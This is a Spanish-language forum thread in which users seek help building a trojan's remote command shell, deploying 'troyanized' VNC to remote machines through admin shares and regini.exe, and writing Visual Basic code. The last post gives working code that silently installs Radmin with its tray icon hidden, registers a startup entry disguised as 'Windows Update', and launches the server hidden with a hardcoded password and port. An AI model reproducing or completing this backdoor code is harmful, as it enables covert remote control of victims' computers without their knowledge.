Mensajes

Man no dejes de postear si lo solucionas, a mi me pasa cosas parecidas yo quisiera que me quedara igual que el del bifrost pero que va hay cosas que no comprendo, mañana sin falta te pongo el code que uso para la Shell, es usando Pipes, 2 inconvenientes que recuerdo son...

Que cuando tecleas un comando por ejemplo el Time, se marea porque el queda esperando que le introduzcas una fecha y tienes que cerrar la aplicacion.

El otro es por ejemplo el del Copiar.. d:\>copy *.txt c:\windows\config esto me da problemas porque el coje y busca en la carpeta donde el RAT se encuentra cualquier .txt y lo copia, en ves de buscar en la raiz de D: y copiar todos los *.txt

Que lo del copiar se arregla si pones toda la sintaxis asi..

d:\>copy d:\*.txt c:\windows\config

asi si funciona pero bueno jejeje quiero hacerlo mas kuki por asi decir...

Salu2

No creo q funcione, pero dime como seria la cosa...

Estoy un poco decepcionado toy pensando quitarlo y poner un FTP...

Grx

Ola people ya voy a terminar el bicho y se me antojo hacer la tipica shell como tienen muchos troyanos, como Bifrost, Poison, etc..

Lo que me sucede es que por ejemplo si quiero ejecutar un "dir" con el comando q usan por ahi...

cmd /c dir>c:\registro.txt

esto no funka bien porque ejecuta el dir en el directorio donde esta el troyano, entonces modifique mi soft para que pusiera el directorio en donde estaba el usuario trabajando digamos que estuviese en c:\windows\pepito entonces quedaba asi

dir c:\windows\pepe

y funka pero si lo usas con otro comando como por ejemplo

copy *.txt c:\windows\system32

ya eso da problemas, espero que entiendan lo que me sucede, en resumen que el comando ese esta limitado, haber si alguien me echa una manita...

Salu2 y grx

Hola gente, tengo esta situacion, estoy programando un proxy que pida autentificacion y donde se traba el paragua es en que cuando le mando el mensaje al cliente "407" pidiendole que me ponga user con pass, el cliente tipea y cuando acepta a mi programa nunca le llega la respuesta del cliente, que me puede estar pasando...
yo debugue y a mi programa la unica ves que le llega datos del browser es cuando solicita la web por primera vez, despues que le envio el "407", que me responde ahi se queda el browser tratando como de enviar algo y nunca llega, instale el Ccproxy y funciona de maravillas asi que es algo que estoy pasando por alto supongo, de echo el mensaje "407" que le envio al cliente, es el que usa el mismo Ccproxy y funciona genial solo que no me llega la respuesta del cliente..soluciones...

Thx

Pues eso como logro poner mi soft como un servicio..

GRax...

Mira te mentiria, pero en mi caso para xp win200
me pongo como administrador

me mapeo

C:\net use x: \\10.10.0.x\C$ pwd /user:nombre_equipo_remoto\test

entro ami regedit

y me conecto remotamente

modifico

en el caso de win200
subes el regini
y en la shell
regini.exe -m \\10.10.1.253 vnc.ini
regini.exe -m \\10.10.1.253 vnc.ini(2 veces)

archivos upload (regini.exe, vnc.ini)

Man como confecciono el .ini, si fueras tan amable de postearmelo aki..

salu2

Alguien lo tiene trabajando porque no encuentro el VNC 3 el que tengo es el 4, por favor subanlo pq trate de bajar los de aqui y ya no existen, gracias...

Hola Hole_System, yo lo troyanize con el TightVNC q podes bajarte de http://www.tightvnc.com/download.html.. espero te sirva

Saludos..

Tiens alguna manual...

salu2

Alguien lo tiene trabajando porque no encuentro el VNC 3 el que tengo es el 4, por favor subanlo pq trate de bajar los de aqui y ya no existen, gracias...

salu2

Busca la clase Lightning en PSC que tiene todo

puedes ser mas especifico

Hola people veran lo mio es sencillo lo que necesito es agregar tres valores en el Registro de tipo Binary como veran en el codigo de abajo, estoy anadiendo:
01 00 00 00
pero tambien necesito agregar estos otros 2..
4c 78 c7 ed d9 e4 16 e9 45 1b e9 7c bb 7c 2e cb
y
b4 11 00 00
como hago para agregarlos

Gracias...


Const REG_SZ = 1    ' Unicode nul terminated string
Const REG_BINARY = 3    ' Free form binary
Const HKEY_LOCAL_MACHINE = &H80000002
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

Sub SaveStringLong(hKey As Long, strPath As String, strValue As String, strData As String, dif As String)
    Dim Ret
    '   Create a new key
    RegCreateKey hKey, strPath, Ret
    '   Set the key's value
    If dif = 1 Then
        RegSetValueEx Ret, strValue, 0, REG_BINARY, CLng(strData), 4
    ElseIf dif = 2 Then
        RegSetValueEx Ret, strValue, 0, REG_SZ, ByVal strData, Len(strData)
    End If
    '   Close the key
    RegCloseKey Ret
End Sub

Private Sub Form_Load()
    'KPD-Team 1998
    'URL: http://www.allapi.net/
    'E-Mail: KPDTeam@Allapi.net
    Dim strString As String
    'Ask for a value
    'Save the value to the registry
    SaveStringLong HKEY_LOCAL_MACHINE, "System\RAdmin\v2.0\Server\Parameters", "DisableTrayIcon", "01", "1" ' Agrego 01 00 00 00
    SaveStringLong HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", "Windows Update", "C:\Windows\System32\wupd.exe", "2"
    Shell "apisystem.exe /pass:zxczxc /port:4532", vbHide
    End
End Sub